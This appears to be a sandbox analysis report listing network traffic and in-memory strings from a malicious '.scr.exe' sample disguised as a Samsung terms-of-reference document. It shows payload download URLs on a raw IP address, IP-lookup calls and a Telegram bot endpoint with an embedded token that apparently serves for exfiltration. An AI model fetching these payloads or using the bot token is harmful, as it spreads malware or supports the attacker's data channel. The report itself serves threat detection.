Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win64_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficHTTP traffic detected: GET /TeamBuild/win32_svchost.exe HTTP/1.1Host: 89.23.97.214
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1Host: api.telegram.orgContent-Type: application/x-www-form-urlencodedContent-Length: 138
Source: Terms_of_reference_06_01_2025_samsung.scr.exeString found in binary or memory: http://.css
Source: Terms_of_reference_06_01_2025_samsung.scr.exeString found in binary or memory: http://.jpg
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exe
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/TeamBuild/win32_svchost.exehttp://89.23.97.214/TeamBuild/win64_svchost.exewin32_
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214/TeamBuild/win64_svchost.exeh
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776479000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.23.97.214:80/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org:443/
Source: powershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 00000009.00000002.2239299222.0000014440981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000009.00000002.2338412059.0000014458E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: powershell.exe, 00000002.00000002.2168143247.0000029BCDA86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://exslt.org/common
Source: Terms_of_reference_06_01_2025_samsung.scr.exeString found in binary or memory: http://html4/loose.dtd
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
Source: powershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2110018131.000001F7015DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166181193.000002980BC11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159637398.0000025773A11000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159598217.00000257739F0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159580002.00000257739E1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2107852680.0000029BB58B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164165214.000002980B870000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168325428.000002980C5E1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162093744.0000029809240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3188177414.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000000.2057822710.00007FF6A7FDD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000002.00000002.2107852680.0000029BB5691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2110018131.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2239791805.0000014440AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161453512.0000029808CB6000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167964729.000002980C4D0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168032463.000002980C521000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.0000025776400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577643F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.000002577649F000.00000004.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159734956.00000257764A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessageh
Source: powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2239791805.0000014440CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167776836.000002980C420000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166830112.000002980BDC1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159219363.0000025773920000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164582542.000002980B9F1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168744151.000002980CA01000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166578673.000002980BD50000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808F13000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166397720.000002980BD21000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160570585.00000298087E0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165946958.000002980BB30000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166713900.000002980BD91000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160343247.00000298086C1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160412636.0000029808700000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165358680.000002980BAC0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160552630.00000298087D1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159661089.0000025773A30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE32000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160643230.0000029808810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3161677504.0000029808DB1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.2110018131.000001F700C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2153023770.0000029BC5704000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F710074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2181689526.000001F7101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2324712543.0000014450B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
